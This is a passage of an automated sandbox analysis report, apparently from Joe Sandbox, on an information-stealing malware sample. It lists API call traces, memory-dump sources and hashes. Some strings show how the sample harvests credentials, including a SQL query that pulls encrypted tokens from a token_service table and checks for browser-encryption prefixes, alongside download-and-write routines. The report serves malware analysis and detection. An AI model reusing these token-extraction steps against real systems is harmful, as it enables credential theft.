                                        • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                      • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                      • lstrcatA.KERNEL32(?,?), ref: 00414820
                                      • lstrcatA.KERNEL32(?,?), ref: 00414834
                                      • lstrcatA.KERNEL32(?,0087CDB0), ref: 00414847
                                      • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                      • lstrcatA.KERNEL32(?,00881020), ref: 0041486F
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                        • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                        • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                        • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                        • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                      • String ID: 0aA
                                      • API String ID: 167551676-2786531170
                                      • Opcode ID: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                      • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                      • Opcode Fuzzy Hash: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                      • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,008806F8,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,008806F8,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                      • __aulldiv.LIBCMT ref: 00418172
                                      • __aulldiv.LIBCMT ref: 00418180
                                      • wsprintfA.USER32 ref: 004181AC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                      • String ID: %d MB$@
                                      • API String ID: 2886426298-3474575989
                                      • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                      • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                      • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                      • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                      APIs
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A51
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A68
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A7F
                                        • Part of subcall function 02304A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02304AA0
                                        • Part of subcall function 02304A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02304AB0
                                      • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 02306376
                                      • StrCmpCA.SHLWAPI(?,0064A480), ref: 023063AE
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 023063F6
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 0230641A
                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 02306443
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 02306471
                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 023064B0
                                      • InternetCloseHandle.WININET(?), ref: 023064BA
                                      • InternetCloseHandle.WININET(00000000), ref: 023064C7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                      • String ID:
                                      • API String ID: 4287319946-0
                                      • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                      • Instruction ID: 870ce40497915d95b47b4b17439a9295cec277adb6f6848852ac0224a7cb83de
                                      • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                      • Instruction Fuzzy Hash: 855190B5A40218AFDB24DFA0DC95BEE7779EB04705F008098F605A71C4DBB4AB85CFA5
                                      APIs
                                      • memset.MSVCRT ref: 02314FEE
                                        • Part of subcall function 02319047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02319072
                                      • lstrcat.KERNEL32(?,00000000), ref: 02315017
                                      • lstrcat.KERNEL32(?,00421000), ref: 02315034
                                        • Part of subcall function 02314B77: wsprintfA.USER32 ref: 02314B93
                                        • Part of subcall function 02314B77: FindFirstFileA.KERNEL32(?,?), ref: 02314BAA
                                      • memset.MSVCRT ref: 0231507A
                                      • lstrcat.KERNEL32(?,00000000), ref: 023150A3
                                      • lstrcat.KERNEL32(?,00421020), ref: 023150C0
                                        • Part of subcall function 02314B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 02314BD8
                                        • Part of subcall function 02314B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 02314BEE
                                        • Part of subcall function 02314B77: FindNextFileA.KERNEL32(000000FF,?), ref: 02314DE4
                                        • Part of subcall function 02314B77: FindClose.KERNEL32(000000FF), ref: 02314DF9
                                      • memset.MSVCRT ref: 02315106
                                      • lstrcat.KERNEL32(?,00000000), ref: 0231512F
                                      • lstrcat.KERNEL32(?,00421038), ref: 0231514C
                                        • Part of subcall function 02314B77: wsprintfA.USER32 ref: 02314C17
                                        • Part of subcall function 02314B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 02314C2C
                                        • Part of subcall function 02314B77: wsprintfA.USER32 ref: 02314C49
                                        • Part of subcall function 02314B77: PathMatchSpecA.SHLWAPI(?,?), ref: 02314C85
                                        • Part of subcall function 02314B77: lstrcat.KERNEL32(?,0064A524), ref: 02314CB1
                                        • Part of subcall function 02314B77: lstrcat.KERNEL32(?,00420FF8), ref: 02314CC3
                                        • Part of subcall function 02314B77: lstrcat.KERNEL32(?,?), ref: 02314CD7
                                        • Part of subcall function 02314B77: lstrcat.KERNEL32(?,00420FFC), ref: 02314CE9
                                        • Part of subcall function 02314B77: lstrcat.KERNEL32(?,?), ref: 02314CFD
                                        • Part of subcall function 02314B77: CopyFileA.KERNEL32(?,?,00000001), ref: 02314D13
                                        • Part of subcall function 02314B77: DeleteFileA.KERNEL32(?), ref: 02314D98
                                      • memset.MSVCRT ref: 02315192
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID:
                                      • API String ID: 4017274736-0
                                      • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                      • Instruction ID: 79cb80718ade37b54009954b3293d69fda20f5d1018b7a416ce18fcbfa328a44
                                      • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                      • Instruction Fuzzy Hash: 3641B779A4021467D728F7B0EC46FDD7739AF24701F404495B689660C0EEB957C8CFA2
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 02318397
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0231839E
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 023183BF
                                      • __aulldiv.LIBCMT ref: 023183D9
                                      • __aulldiv.LIBCMT ref: 023183E7
                                      • wsprintfA.USER32 ref: 02318413
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                      • String ID: @
                                      • API String ID: 2774356765-2766056989
                                      • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                      • Instruction ID: 982d79737f90e52f3a5430623590b4c0bf8e0eda6ede2b78c6c89212ce7e68c7
                                      • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                      • Instruction Fuzzy Hash: 90214AB1E44218ABEB14DFD4CC49FAEB7B9FB45B04F104609F605BB680D77869008BA9
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                      • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                      • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                      • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                      • API String ID: 1440504306-1079375795
                                      • Opcode ID: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                      • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                      • Opcode Fuzzy Hash: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                      • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess$DefaultLangUser
                                      • String ID: B
                                      • API String ID: 1494266314-2248957098
                                      • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                      • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                      • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                      • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                      APIs
                                      • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                        • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                        • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                        • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                        • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                      • memset.MSVCRT ref: 00409EE8
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                      • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                      • API String ID: 1977917189-1096346117
                                      • Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                      • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                      • Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                      • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                      APIs
                                        • Part of subcall function 02307537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 023075A1
                                        • Part of subcall function 02307537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 02307618
                                        • Part of subcall function 02307537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 02307674
                                        • Part of subcall function 02307537: GetProcessHeap.KERNEL32(00000000,?), ref: 023076B9
                                        • Part of subcall function 02307537: HeapFree.KERNEL32(00000000), ref: 023076C0
                                      • lstrcat.KERNEL32(0064A668,004217FC), ref: 0230786D
                                      • lstrcat.KERNEL32(0064A668,00000000), ref: 023078AF
                                      • lstrcat.KERNEL32(0064A668,00421800), ref: 023078C1
                                      • lstrcat.KERNEL32(0064A668,00000000), ref: 023078F6
                                      • lstrcat.KERNEL32(0064A668,00421804), ref: 02307907
                                      • lstrcat.KERNEL32(0064A668,00000000), ref: 0230793A
                                      • lstrcat.KERNEL32(0064A668,00421808), ref: 02307954
                                      • task.LIBCPMTD ref: 02307962
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                      • String ID:
                                      • API String ID: 2677904052-0
                                      • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                      • Instruction ID: ceec174346cd13f2f37a842cdfcc656188b0cc1c8721d05bd2726d1572a5ba41
                                      • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                      • Instruction Fuzzy Hash: 47310C79E40109EFDB14EBE0DCE5DFE777AEB49301B145118E106A7290DA34E946CF61
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                      • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                      • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                      • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                      • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                      • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                      • InternetCloseHandle.WININET(?), ref: 004050C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                      • String ID:
                                      • API String ID: 3894370878-0
                                      • Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                      • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                      • Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                      • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02305231
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02305238
                                      • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 02305251
                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 02305278
                                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 023052A8
                                      • memcpy.MSVCRT(00000000,?,00000001), ref: 023052F1
                                      • InternetCloseHandle.WININET(?), ref: 02305320
                                      • InternetCloseHandle.WININET(?), ref: 0230532D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                      • String ID:
                                      • API String ID: 1008454911-0
                                      • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                      • Instruction ID: 64d792a784aa2e78d27d82b74e48bcc33eaf3ce1476992ef2be6ff6741981899
                                      • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                      • Instruction Fuzzy Hash: 3031F9B4A40218ABDB20CF94DC85BDCB7B5FB48704F5081D9E609A7281D7746AC5CF59
                                      APIs
                                        • Part of subcall function 0231AA87: lstrlen.KERNEL32(0230516C,?,?,0230516C,00420DDE), ref: 0231AA92
                                        • Part of subcall function 0231AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0231AAEC
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 023158AB
                                      • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 02315908
                                      • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 02315ABE
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 02315457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 0231548F
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 02315527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 0231557F
                                        • Part of subcall function 02315527: lstrlen.KERNEL32(00000000), ref: 02315596
                                        • Part of subcall function 02315527: StrStrA.SHLWAPI(00000000,00000000), ref: 023155CB
                                        • Part of subcall function 02315527: lstrlen.KERNEL32(00000000), ref: 023155EA
                                        • Part of subcall function 02315527: strtok.MSVCRT(00000000,?), ref: 02315605
                                        • Part of subcall function 02315527: lstrlen.KERNEL32(00000000), ref: 02315615
                                      • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 023159F2
                                      • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 02315BA7
                                      • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 02315C73
                                      • Sleep.KERNEL32(0000EA60), ref: 02315C82
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleepstrtok
                                      • String ID:
                                      • API String ID: 3630751533-0
                                      • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                      • Instruction ID: 94e8876f5795999882418f17d9eb5ae9f3d749824c0322104e35ea8b95267a5f
                                      • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                      • Instruction Fuzzy Hash: 20E14E71911208ABCB2CFBA0DE95EEE777AAF55301F80816DE546660D0EF346B48CF91
                                      APIs
                                      • memset.MSVCRT ref: 0230158E
                                        • Part of subcall function 02301507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0230151B
                                        • Part of subcall function 02301507: RtlAllocateHeap.NTDLL(00000000), ref: 02301522
                                        • Part of subcall function 02301507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0230153E
                                        • Part of subcall function 02301507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 0230155C
                                        • Part of subcall function 02301507: RegCloseKey.ADVAPI32(?), ref: 02301566
                                      • lstrcat.KERNEL32(?,00000000), ref: 023015B6
                                      • lstrlen.KERNEL32(?), ref: 023015C3
                                      • lstrcat.KERNEL32(?,004262E4), ref: 023015DE
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 02318DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02301660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 02318DED
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 023016CC
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 02309C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02309C53
                                        • Part of subcall function 02309C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02309C78
                                        • Part of subcall function 02309C27: LocalAlloc.KERNEL32(00000040,?), ref: 02309C98
                                        • Part of subcall function 02309C27: ReadFile.KERNEL32(000000FF,?,00000000,023016F6,00000000), ref: 02309CC1
                                        • Part of subcall function 02309C27: LocalFree.KERNEL32(023016F6), ref: 02309CF7
                                        • Part of subcall function 02309C27: CloseHandle.KERNEL32(000000FF), ref: 02309D01
                                      • DeleteFileA.KERNEL32(00000000), ref: 02301756
                                      • memset.MSVCRT ref: 0230177D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                      • String ID:
                                      • API String ID: 3885987321-0
                                      • Opcode ID: 65992f5c161543344b7d7a67b9e28a0d0697389c6807308598fc34cd9fe59a0c
                                      • Instruction ID: 10adfcb3914243925d0933259fd9305ef396369980dc765320a48fbd28d90ccc
                                      • Opcode Fuzzy Hash: 65992f5c161543344b7d7a67b9e28a0d0697389c6807308598fc34cd9fe59a0c
                                      • Instruction Fuzzy Hash: 23516FB1D402189BCB29FB60DD91FED777EAF54701F4041A8A64AA20C0EF306B89CF65
                                      APIs
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                      • wsprintfA.USER32 ref: 00418459
